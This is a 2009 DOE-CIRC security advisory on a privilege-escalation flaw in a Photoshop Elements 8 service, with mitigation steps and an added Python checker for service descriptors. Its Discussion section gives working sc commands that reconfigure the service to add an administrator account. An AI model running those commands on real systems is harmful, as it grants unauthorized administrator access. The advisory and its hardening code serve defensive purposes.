
DOE-CIRC TECHNICAL BULLETIN

T-242: Adobe Photoshop Elements Active File Monitor Service Local Privilege Escalation Vulnerability

September 30, 2009 15:00 GMT

PROBLEM: Adobe Photoshop Elements is prone to a local privilege-escalation vulnerability because the application has insufficient protections in a security descriptor.
PLATFORM: Adobe Photoshop Elements 8.0
ABSTRACT: A local user in the 'Users' group can stop the service, invoke the 'sc config' command to point the service's binary path at an arbitrary command, and then restart the service to execute that command with SYSTEM privileges.

LINKS:
  DOE-CIRC BULLETIN: http://www.doecirc.energy.gov/bulletins/t-242.shtml
  OTHER LINKS:
    Security Focus: http://www.securityfocus.com/bid/36542/info
    Adobe Website: http://www.adobe.com/products/photoshopelwin/


IMPACT ASSESSMENT: This risk is medium. Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will completely compromise an affected computer.

Discussion:
The "Adobe Active File Monitor V8" service is installed with an improper security descriptor. A member of the Users group (on Windows XP, a "limited account") can stop the service, invoke "sc config" to replace the service's binary path with a command of their choice, and then restart the service so that the Service Control Manager runs that command with SYSTEM privileges. For example, run these commands as a limited user:

sc stop "AdobeActiveFileMonitor8.0"
sc config "AdobeActiveFileMonitor8.0" binPath= "cmd /c net user adobe kills /add && net localgroup Administrators adobe /add"
sc start "AdobeActiveFileMonitor8.0"
runas /noprofile /user:%COMPUTERNAME%\adobe cmd

Enter the password "kills" at the runas prompt; the resulting cmd.exe runs as the newly created local administrator account "adobe".

Mitigation:

The security descriptor of the service, as reported by sc sdshow, is:

C:\>sc sdshow "AdobeActiveFileMonitor8.0"

D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPWPDTLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

Note the final ACE, which grants Everyone (SID abbreviation WD) the same rights as Administrators. Among them are DC (SERVICE_CHANGE_CONFIG, enough to rewrite the binary path), RP and WP (start and stop), and WD and WO (WRITE_DAC and WRITE_OWNER, enough to rewrite the service's ACL itself).

Change the security descriptor as follows. Note that sc sdset replaces the entire descriptor, so record the sc sdshow output first. The new descriptor drops the Everyone ACE and also removes the stop (WP) and pause/continue (DT) rights from Power Users:

C:\>sc sdset "AdobeActiveFileMonitor8.0" D:(A;;CCLCSWLOCRRC;;;AU)(A;;CCLCSWRPLOCRRC;;;PU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWRPWPDTLOCRRC;;;SY)
[SC] SetServiceObjectSecurity SUCCESS
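Both the check described in the Discussion (which trustees hold which service rights) and the Mitigation (removing the offending grant) can be scripted. The following is an added example, not part of the DOE-CIRC bulletin or of Adobe's software: a small Python parser for the DACL portion of an SDDL string as printed by sc sdshow. It flags allow-ACEs that give Everyone, Authenticated Users, Users, Interactive or Anonymous the SERVICE_CHANGE_CONFIG, WRITE_DAC or WRITE_OWNER rights, and emits a descriptor with those ACEs dropped. The two descriptor strings embedded in it are the ones quoted in this bulletin; the hardening rule (drop the whole offending ACE) is this example's own choice and differs slightly from the bulletin's sdset, which additionally removes the stop right from Power Users.

```python
import re

# Service-specific meaning of each SDDL access-right code. The two-letter
# codes are the generic directory-object codes; the Service Control Manager
# interprets the same bits as the service rights named here.
SERVICE_RIGHTS = {
    "CC": "SERVICE_QUERY_CONFIG", "DC": "SERVICE_CHANGE_CONFIG",
    "LC": "SERVICE_QUERY_STATUS", "SW": "SERVICE_ENUMERATE_DEPENDENTS",
    "RP": "SERVICE_START", "WP": "SERVICE_STOP",
    "DT": "SERVICE_PAUSE_CONTINUE", "LO": "SERVICE_INTERROGATE",
    "CR": "SERVICE_USER_DEFINED_CONTROL", "SD": "DELETE",
    "RC": "READ_CONTROL", "WD": "WRITE_DAC", "WO": "WRITE_OWNER",
}
# Bit values of the same codes, for descriptors that sdshow prints in hex.
RIGHT_BITS = {"CC": 0x1, "DC": 0x2, "LC": 0x4, "SW": 0x8, "RP": 0x10,
              "WP": 0x20, "DT": 0x40, "LO": 0x80, "CR": 0x100,
              "SD": 0x10000, "RC": 0x20000, "WD": 0x40000, "WO": 0x80000}

# Rights that let the holder change what runs as SYSTEM (DC rewrites binPath)
# or grant themselves that ability by rewriting the ACL (WD, WO).
DANGEROUS = {"DC", "WD", "WO"}

# Well-known SID abbreviations for broad, low-privilege trustees.
LOW_PRIV_SIDS = {"WD": "Everyone", "AU": "Authenticated Users",
                 "BU": "Users", "IU": "Interactive", "AN": "Anonymous"}

ACE_RE = re.compile(r"\(([^)]*)\)")

# The two descriptors quoted in this bulletin (vulnerable and corrected).
VULNERABLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)"
                   "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                   "(A;;CCLCSWLOCRRC;;;AU)"
                   "(A;;CCLCSWRPWPDTLOCRRC;;;PU)"
                   "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
CORRECTED_SDDL = ("D:(A;;CCLCSWLOCRRC;;;AU)"
                  "(A;;CCLCSWRPLOCRRC;;;PU)"
                  "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                  "(A;;CCLCSWRPWPDTLOCRRC;;;SY)")


def split_rights(rights):
    """Turn 'CCDCLC...' or a hex mask such as '0x40002' into right codes."""
    rights = rights.strip()
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return {code for code, bit in RIGHT_BITS.items() if mask & bit}
    if len(rights) % 2:
        raise ValueError("malformed rights string: %r" % rights)
    return {rights[i:i + 2] for i in range(0, len(rights), 2)}


def parse_dacl(sddl):
    """Return the DACL of an SDDL string as a list of ACE dicts."""
    start = sddl.find("D:")
    if start < 0:
        raise ValueError("SDDL string has no DACL")
    end = sddl.find("S:", start + 2)          # a SACL, if present, follows
    dacl = sddl[start + 2:end if end >= 0 else None]
    aces = []
    for body in ACE_RE.findall(dacl):
        fields = body.split(";")               # type;flags;rights;obj;inherit;sid
        if len(fields) != 6:
            raise ValueError("malformed ACE: (%s)" % body)
        ace_type, _flags, rights, _obj, _inherit, sid = fields
        aces.append({"type": ace_type, "rights": split_rights(rights),
                     "sid": sid, "raw": "(%s)" % body})
    return aces


def find_weak_aces(sddl):
    """(trustee, [right names]) for every allow-ACE that lets a low-privilege
    trustee reconfigure the service or rewrite its ACL."""
    findings = []
    for ace in parse_dacl(sddl):
        if ace["type"] != "A" or ace["sid"] not in LOW_PRIV_SIDS:
            continue
        bad = sorted(ace["rights"] & DANGEROUS)
        if bad:
            findings.append((LOW_PRIV_SIDS[ace["sid"]],
                             [SERVICE_RIGHTS[r] for r in bad]))
    return findings


def harden(sddl):
    """Return a DACL-only descriptor with every offending ACE dropped."""
    kept = [ace["raw"] for ace in parse_dacl(sddl)
            if not (ace["type"] == "A" and ace["sid"] in LOW_PRIV_SIDS
                    and ace["rights"] & DANGEROUS)]
    return "D:" + "".join(kept)


if __name__ == "__main__":
    for name, sddl in (("vulnerable", VULNERABLE_SDDL),
                       ("corrected", CORRECTED_SDDL)):
        print(name, find_weak_aces(sddl) or "OK")
    print('sc sdset "AdobeActiveFileMonitor8.0"', harden(VULNERABLE_SDDL))
```

Run it against the output of sc sdshow on the host; a clean result for the corrected descriptor shows that the bulletin's sdset line removes the dangerous grant, and the harden() output is a starting point for the sdset argument on a service with a different ACL. Because sc sdset overwrites the whole descriptor, keep the original sdshow output so it can be restored if needed.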

Currently, there are no vendor supplied patches.


DOE-CIRC services are available to DOE, DOE Contractors, and the NIH. DOE-CIRC can be contacted at:
    Voice:          866-941-2472
    E-mail:          doecirc@doecirc.energy.gov
    World Wide Web:  http://www.doecirc.energy.gov


UCRL-MI-119788